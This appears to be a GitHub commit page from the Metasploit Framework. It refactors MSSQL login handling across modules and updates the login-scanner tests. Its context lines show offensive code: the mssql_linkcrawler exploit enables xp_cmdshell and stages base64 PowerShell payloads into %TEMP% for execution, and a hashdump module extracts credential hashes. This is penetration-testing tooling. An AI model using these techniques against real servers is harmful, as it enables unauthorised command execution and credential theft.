testing fix

rapid7 · Jan 30, 2024 · 6d47fb8 · 6d47fb8
1 parent d05b650
commit 6d47fb8
Show file tree

Hide file tree

Showing 12 changed files with 28 additions and 29 deletions.
diff --git a/lib/metasploit/framework/tcp/client.rb b/lib/metasploit/framework/tcp/client.rb
@@ -73,6 +73,7 @@ module Client
         # @see Rex::Socket::Tcp
         # @see Rex::Socket::Tcp.create
         def connect(global = true, opts={})
+
           dossl = false
           if(opts.has_key?('SSL'))
             dossl = opts['SSL']
@@ -92,12 +93,11 @@ def connect(global = true, opts={})
               'SSLCipher'     =>  opts['SSLCipher'] || ssl_cipher,
               'Proxies'       => proxies,
               'Timeout'       => (opts['ConnectTimeout'] || connection_timeout || 10).to_i,
-              'Context'       => { 'Msf' => framework, 'MsfExploit' => self }
+              'Context'       => { 'Msf' => framework, 'MsfExploit' => framework_module }
               )
           # enable evasions on this socket
           set_tcp_evasions(nsock)
 
-
           # Set this socket to the global socket as necessary
           self.sock = nsock if (global)
 

diff --git a/lib/msf/core/module/alert.rb b/lib/msf/core/module/alert.rb
@@ -202,7 +202,7 @@ def add_alert(level, msg, &block)
   def alert_user
     self.you_have_been_warned ||= {}
 
-    errors.each do |msg| 
+    errors.each do |msg|
       if msg && !self.you_have_been_warned[msg.hash]
         print_error(msg)
         self.you_have_been_warned[msg.hash] = true

diff --git a/lib/rex/proto/mssql/client.rb b/lib/rex/proto/mssql/client.rb
@@ -66,9 +66,9 @@ def initialize(framework_module, framework, rhost, rport = 1433)
         #
         def mssql_login(user='sa', pass='', db='', domain_name='')
           disconnect if self.sock
-
           connect
           mssql_prelogin
+
           if auth == Msf::Exploit::Remote::AuthOption::KERBEROS
             idx = 0
             pkt = ''

diff --git a/modules/auxiliary/admin/mssql/mssql_enum.rb b/modules/auxiliary/admin/mssql/mssql_enum.rb
@@ -19,7 +19,6 @@ module to work, valid administrative user credentials must be
       'Author'         => [ 'Carlos Perez <carlos_perez[at]darkoperator.com>' ],
       'License'        => MSF_LICENSE
     ))
-
   end
 
   def run

diff --git a/modules/auxiliary/admin/mssql/mssql_findandsampledata.rb b/modules/auxiliary/admin/mssql/mssql_findandsampledata.rb
@@ -342,7 +342,6 @@ def sql_statement()
 
     # CREATE DATABASE CONNECTION AND SUBMIT QUERY WITH ERROR HANDLING
     begin
-      #here
       result = mssql_query(sql, false) if mssql_login_datastore
 
       column_data = result[:rows]

diff --git a/modules/auxiliary/admin/mssql/mssql_idf.rb b/modules/auxiliary/admin/mssql/mssql_idf.rb
@@ -154,7 +154,7 @@ def run
       full_table.slice!(-1, 1)
       count_sql += full_table
 
-      result = mssql_query(count_sql, false) if mssql_login(datastore['USERNAME'], datastore['PASSWORD'])
+      result = mssql_query(count_sql, false) if mssql_login_datastore
 
       count_data = result[:rows]
       row_count = count_data[0][0]

diff --git a/modules/auxiliary/scanner/mssql/mssql_hashdump.rb b/modules/auxiliary/scanner/mssql/mssql_hashdump.rb
@@ -25,7 +25,7 @@ def initialize
 
   def run_host(ip)
 
-    if !mssql_login(datastore['USERNAME'], datastore['PASSWORD'])
+    if !mssql_login_datastore
       print_error("Invalid SQL Server credentials")
       return
     end
@@ -70,7 +70,7 @@ def run_host(ip)
     create_credential_login(login_data)
 
     # Grabs the Instance Name and Version of MSSQL(2k,2k5,2k8)
-    instancename= mssql_query(mssql_enumerate_servername())[:rows][0][0].split('\\')[0]
+    instancename= mssql_query(mssql_enumerate_servername())[:rows][0][0].split('\\')[1]
     print_status("Instance Name: #{instancename.inspect}")
     version = mssql_query(mssql_sql_info())[:rows][0][0]
     version_year = version.split('-')[0].slice(/\d\d\d\d/)

diff --git a/modules/auxiliary/scanner/mssql/mssql_ping.rb b/modules/auxiliary/scanner/mssql/mssql_ping.rb
@@ -16,10 +16,6 @@ def initialize
       'License'        => MSF_LICENSE
     )
 
-    register_options(
-      [
-        OptInt.new('THREADS', [true, "The number of concurrent threads (max one per host)", 1]),
-      ])
     deregister_options('RPORT')
   end
 

diff --git a/modules/exploits/windows/mssql/lyris_listmanager_weak_pass.rb b/modules/exploits/windows/mssql/lyris_listmanager_weak_pass.rb
@@ -36,9 +36,6 @@ def initialize(info = {})
       'DefaultTarget'  => 0,
       'DisclosureDate' => '2005-12-08'
     ))
-    register_options([
-      OptBool.new('DISPLAY_RESULTS', [true, "Display the Results to the Screen", true])
-    ])
   end
 
   # Do not automatically run this module, it can lead to lockouts with SQL Server 2005

diff --git a/modules/exploits/windows/mssql/mssql_clr_payload.rb b/modules/exploits/windows/mssql/mssql_clr_payload.rb
@@ -51,7 +51,7 @@ def initialize(info = {})
   end
 
   def check
-    unless mssql_login(datastore['USERNAME'], datastore['PASSWORD'], datastore['DATABASE'])
+    unless mssql_login_datastore(datastore['DATABASE'])
       vprint_status('Invalid SQL Server credentials')
       return Exploit::CheckCode::Detected
     end
@@ -133,7 +133,7 @@ def is_clr_enabled
   end
 
   def exploit
-    unless mssql_login(datastore['USERNAME'], datastore['PASSWORD'], datastore['DATABASE'])
+    unless mssql_login_datastore(datastore['DATABASE'])
       fail_with(Failure::BadConfig, 'Unable to login with the given credentials')
     end
 

diff --git a/modules/exploits/windows/mssql/mssql_linkcrawler.rb b/modules/exploits/windows/mssql/mssql_linkcrawler.rb
@@ -78,7 +78,7 @@ def exploit
     # Check if credentials are correct
     print_status("Attempting to connect to SQL Server at #{datastore['RHOST']}:#{datastore['RPORT']}...")
 
-    if !mssql_login(datastore['USERNAME'], datastore['PASSWORD'])
+    if !mssql_login_datastore
       print_error("Invalid SQL Server credentials")
       print_status("-------------------------------------------------")
       return
@@ -408,20 +408,20 @@ def enable_xp_cmdshell(path,name,shelled)
         # Enabling show advanced options and xp_cmdshell
         execute = "sp_configure 'show advanced options',1;reconfigure"
         sql = query_builder_rpc(path,"",0,execute)
-        result = mssql_login_datastore
+        result = mssql_query(sql, false) if mssql_login_datastore
       end
 
       # Enabling xp_cmdshell
       print_status("\t - xp_cmdshell is not enabled on " + name + "... Trying to enable")
       execute = "sp_configure 'xp_cmdshell',1;reconfigure"
       sql = query_builder_rpc(path,"",0,execute)
-      result = mssql_login_datastore
+      result = mssql_query(sql, false) if mssql_login_datastore
     end
 
     # Verifying that xp_cmdshell is now enabled (could be unsuccessful due to server policies, total removal etc.)
     execute = "select cast(value_in_use as int) FROM  sys.configurations WHERE  name = 'xp_cmdshell'"
     sql = query_builder(path,"",0,execute)
-    result = mssql_login_datastore
+    result = mssql_query(sql, false) if mssql_login_datastore
     xpcmdNow = result[:rows].pop.pop
 
     if xpcmdNow == 1 or xpcmdOrig == 1
@@ -510,19 +510,19 @@ def powershell_upload_exec(path)
     mytext_64.scan(/.{1,2500}/).each {|part|
       execute = "select 1; EXEC master..xp_cmdshell 'powershell -C \"Write \"--#{linenum}--#{part}\" >> %TEMP%\\#{rand_filename}\"'"
       sql = query_builder(path,"",0,execute)
-      result = mssql_query(sql, false) if mssql_login(datastore['USERNAME'], datastore['PASSWORD'])
+      result = mssql_query(sql, false) if mssql_login_datastore
       linenum = linenum+1
     }
 
     # Remove duplicate lines from temp file and write to new file
     execute = "select 1;exec master..xp_cmdshell 'powershell -C \"gc %TEMP%\\#{rand_filename}| get-unique > %TEMP%\\#{var_duplicates}\"'"
     sql = query_builder(path,"",0,execute)
-    result = mssql_query(sql, false) if mssql_login(datastore['USERNAME'], datastore['PASSWORD'])
+    result = mssql_query(sql, false) if mssql_login_datastore
 
     # Remove tracking tags from lines
     execute = "select 1;exec master..xp_cmdshell 'powershell -C \"gc %TEMP%\\#{var_duplicates} | Foreach-Object {$_ -replace \\\"--.*--\\\",\\\"\\\"} | Set-Content %TEMP%\\#{rand_filename}\"'"
     sql = query_builder(path,"",0,execute)
-    result = mssql_query(sql, false) if mssql_login(datastore['USERNAME'], datastore['PASSWORD'])
+    result = mssql_query(sql, false) if mssql_login_datastore
 
     # Used base64 encoded powershell command so that we could use -noexit and avoid parsing errors
     # If running on 64bit system, 32bit powershell called from syswow64

diff --git a/spec/lib/metasploit/framework/login_scanner/mssql_spec.rb b/spec/lib/metasploit/framework/login_scanner/mssql_spec.rb
@@ -35,7 +35,6 @@
   it_behaves_like 'Metasploit::Framework::LoginScanner::Base',  has_realm_key: true, has_default_realm: true
   it_behaves_like 'Metasploit::Framework::LoginScanner::RexSocket'
   it_behaves_like 'Metasploit::Framework::LoginScanner::NTLM'
-  it_behaves_like 'Metasploit::Framework::Tcp::Client'
 
   it { is_expected.to respond_to :windows_authentication }
 
@@ -81,25 +80,34 @@
 
   context '#attempt_login' do
     context 'when the is a connection error' do
+      let(:client) { instance_double(Rex::Proto::MSSQL::Client) }
       it 'returns a result with the connection_error status' do
         my_scanner = login_scanner
-        expect(my_scanner).to receive(:mssql_login).and_raise ::Rex::ConnectionError
+        allow_any_instance_of(Rex::Proto::MSSQL::Client).to receive(:initialize).and_return(client)
+        allow_any_instance_of(Rex::Proto::MSSQL::Client).to receive(:mssql_login).and_raise ::Rex::ConnectionError
+        allow(client).to receive(:disconnect)
         expect(my_scanner.attempt_login(pub_blank).status).to eq Metasploit::Model::Login::Status::UNABLE_TO_CONNECT
       end
     end
 
     context 'when the login fails' do
+      let(:client) { instance_double(Rex::Proto::MSSQL::Client) }
       it 'returns a result object with a status of Metasploit::Model::Login::Status::INCORRECT' do
         my_scanner = login_scanner
-        expect(my_scanner).to receive(:mssql_login).and_return false
+        allow_any_instance_of(Rex::Proto::MSSQL::Client).to receive(:initialize).and_return(client)
+        allow_any_instance_of(Rex::Proto::MSSQL::Client).to receive(:mssql_login).and_return(false)
+        allow(client).to receive(:disconnect)
         expect(my_scanner.attempt_login(pub_blank).status).to eq Metasploit::Model::Login::Status::INCORRECT
       end
     end
 
     context 'when the login succeeds' do
+      let(:client) { instance_double(Rex::Proto::MSSQL::Client) }
       it 'returns a result object with a status of Metasploit::Model::Login::Status::SUCCESSFUL' do
         my_scanner = login_scanner
-        expect(my_scanner).to receive(:mssql_login).and_return true
+        allow_any_instance_of(Rex::Proto::MSSQL::Client).to receive(:initialize).and_return(client)
+        allow_any_instance_of(Rex::Proto::MSSQL::Client).to receive(:mssql_login).and_return(true)
+        allow(client).to receive(:disconnect)
         expect(my_scanner.attempt_login(pub_blank).status).to eq Metasploit::Model::Login::Status::SUCCESSFUL
       end
     end